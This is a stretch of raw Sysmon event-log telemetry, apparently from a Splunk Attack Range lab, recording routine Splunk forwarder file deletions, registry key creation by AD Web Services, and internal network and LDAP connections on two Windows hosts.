12:18:17.730{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:17.730{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00EA615ECA224B70CED0079383D5426,SHA256=76A2E53591F602AA78774005BBA6A00044D64DCE297316FDF1F5F15BE6B38A25falsetrue 23542300x800000000000000021219813Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:18.893{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8359560333088546E149778740067DE,SHA256=14CB2FF784F010BED6ADD845C584A98A8CDBC40D0046FF89C0524E4EE50DCF59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.745{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.745{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CE1ECEEF68ED061B0E226999AC8BD00,SHA256=911B843B04714F79D99DC96CE56AD2002C37BE7E5FF7844F5E6FDAB7EFDE3106falsetrue 23542300x800000000000000021219812Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:18.143{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F0BD69038D9756F44FAB1732E0AAA99,SHA256=F9A248A48772FBFADF1C2954C376A8C73EA322E7474F588C18094C4B1E7C3551,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057346333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:18.408{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000057346332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:18.408{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 11241100x800000000000000057346331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.261{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.261{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67CC9E9E38F938CC5406E7A0BAECADC1,SHA256=E511DA772868F0B2B9DC4D072AF356CEB7B55EC7CA8534142D11F442B3567F34falsetrue 11241100x800000000000000057346329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.261{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:18.261{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0202708DFAF70EAAA75D2EF09DAAA0C7,SHA256=2DC7F644D81C3619AB91B7F027835425DDB241E92D6790858EC8448C78118596falsetrue 23542300x800000000000000021219815Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:19.893{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9335D11E36C695BCB21499213F2A6757,SHA256=1AF4EAFF0509F600603A84D4C3917167C2214F9769E31E4D1D58B2F1A3ED351B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:19.760{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:19.760{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D896E163B80AD52F4A01A73DE1C5463A,SHA256=5015B7DC9783142985471F92839094CF62400F8EF605D09C5AFE2BAF17B7D643falsetrue 354300x800000000000000021219814Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:05.565{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64336-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057346338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:19.429{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:19.429{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67CC9E9E38F938CC5406E7A0BAECADC1,SHA256=E511DA772868F0B2B9DC4D072AF356CEB7B55EC7CA8534142D11F442B3567F34falsetrue 354300x800000000000000057346336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:49.599{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54560-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219816Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:20.893{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D090784A6E7DB3C9CC36E799F37F6F9D,SHA256=52285C4FEBA81773E1F2E84464325A1D067BF71BA24FEF095CA77230384018F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:20.791{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:20.791{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D6D3C956412B3841EAB556E9D76C086,SHA256=F60A334C216CCED0EEDA0923B07B861DE8535BAA28FFA0EF8971409247CCFC9Afalsetrue 354300x800000000000000057346342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.761{8B6011A9-886B-6164-0B00-00000000F101}648C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54561-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 354300x800000000000000057346341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:50.761{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local54561-true0:0:0:0:0:0:0:1win-dc-469.attackrange.local389ldap 11241100x800000000000000057346346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:21.810{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:21.809{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DED454F4F4A40CFAA4C95578C489807,SHA256=0CDE840C1CDC62A0F6CD5502EB4BE078F735FDB54B60A1CA384BCE160180F1BEfalsetrue 23542300x800000000000000021219818Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:21.894{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546D0A0DCE96FC6AAF2BDCB56B93EEBD,SHA256=37F9F902D26D65903FA3B4940C0CB12824E25FD11429ABC2519A4D39A7FB4081,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219817Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:21.865{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\respondent-20210916142702-79909MD5=8085950F126672766A1DF0580C539A31,SHA256=836015C54DD1F9176CE157D9E23B9B47C196C9CF50DD587B63CC20EE15FEF46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219820Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:22.924{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EB391643ECE096631717B3A8E8781A4,SHA256=299EBF0E55474ADFC6C877C605591C384B51CEB31C73FABAF88F861F87D7955C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:22.827{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:22.827{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8C4BD1B0EB13F27EDEFA6E18576113,SHA256=B635EB7D3F56DFC1CE21AB6B86EDCF2E18EDEC55806C82BB83BFECFBE3AC7A39falsetrue 23542300x800000000000000021219819Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:22.878{AD5E2759-5433-6143-1A00-00000000F101}1972NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-09909a0b10b828df0\channels\health\surveyor-20210916142700-79910MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219821Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:23.927{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CCFAB85CA2773B436BF3BDE1FDE40F7,SHA256=81B875FC71C8EB3937F8FEC67652CB137924678D5A7E08F94C9A12DDD4177124,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:23.842{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:23.842{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B67936804D39B032838C54BDA3809CF2,SHA256=02854E75F76418843A3CB8EE58262D0228B68CA326899E1D5F62AB4C3F90C50Ffalsetrue 11241100x800000000000000057346350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:23.642{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:23.642{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D698070C4014D0F89A8E437C25082813,SHA256=F8F9E96EE3A475C0B41F6D10C672D5AC5FF1BB526D9C118E28641638E0CE1B5Efalsetrue 23542300x800000000000000021219825Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:24.943{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58D3DDD5AE1629FAADE743CDEBE2750B,SHA256=6877791893139449127F250F30798D5569386134DFCA8E732FDCB6F806CBAE73,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:24.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:24.856{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4AD110D7B35A04437CE9C32BB8B9DE4,SHA256=C7F4D32F95108CF1AC2E76EA1B8A8F09E5AD3A8D2FBE5289013D7FB143014992falsetrue 354300x800000000000000021219824Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.487{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64337-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219823Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:24.083{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56ABDB1DD60DF9562712C66D773EB2DB,SHA256=195F9EBDA46C36F23DD961B8DD4AF79D312A240AB52733C36C013AE1330EB62C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219822Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:24.083{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C579C69EEE72ABB6E3846CFD0FFA95E,SHA256=19373B812373C31762F0A824E6B5B3946F2A50C54516DD1E45AEDD844B84C872,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057346353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:55.511{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54562-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057346357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:25.887{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:25.887{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5DFE421608D1FBDA2DB18AA4F4854EF,SHA256=D4818DE593BEAF49C63F25D808F77F2B8C5EFADAD52C48FB7AD35BD62F95D944falsetrue 23542300x800000000000000021219826Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:25.943{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A353D3AB043B70A8B6F5EC5DC91F9E5,SHA256=9E99AE76B21C2F8E79752CAF4ECDB90C8E9AD9B6725F0CA174E6DDC94B027E43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:26.905{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:26.905{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB999ACCE4140459E52C01CACF4AE976,SHA256=9426CD0D5413FB90D418B3F233DFA0057A8D6FB60ECD0A2E9343871535F83CA3falsetrue 23542300x800000000000000021219827Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:26.974{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CC51FC9C82DAE86A29EDE8715EED5C,SHA256=2E6B8D7C30897C7C2BCC728A17E4CCC761DFD70CFE5EE7FA37718E50D61D1DFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219828Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:27.985{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBD8EDD187DA5F7DADFC788A71DE8389,SHA256=61B2AA2E201733EB6DF65B33BDD2AF2B539C15EC2BE9C202007A50B0AC8F51F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057346361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:27.923{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:27.923{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D6832C97367B11330E2B20771E55059,SHA256=E97ECDBD22355C5120BA7BE7B643AA6469E04D82D6FF42CEED01B6BEBBEC681Cfalsetrue 11241100x800000000000000057346367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.969{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.969{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10921BB53C083678136B791C61A036D1,SHA256=BA22C9DD2208092B7EA626268FAA55747CAA6689AD51D464C1776B6A04CD9A23falsetrue 11241100x800000000000000057346365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.638{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.638{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=41302CCEC64350E0E90637E600B2B741,SHA256=234B63BB885130F9A1EBAEBEED26C3D350E4206941D658B22B544A034C00B7C4falsetrue 11241100x800000000000000057346363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.638{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:28.638{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5F574864086603C1F5006955951E53B,SHA256=725BE2A733A469870BD44F1319D34287182CCFDED1268D5E48F10B4F57AECCE5falsetrue 354300x800000000000000021219832Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:16.518{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64338-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219831Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:29.095{AD5E2759-54D4-6143-DD00-00000000F101}1092NT 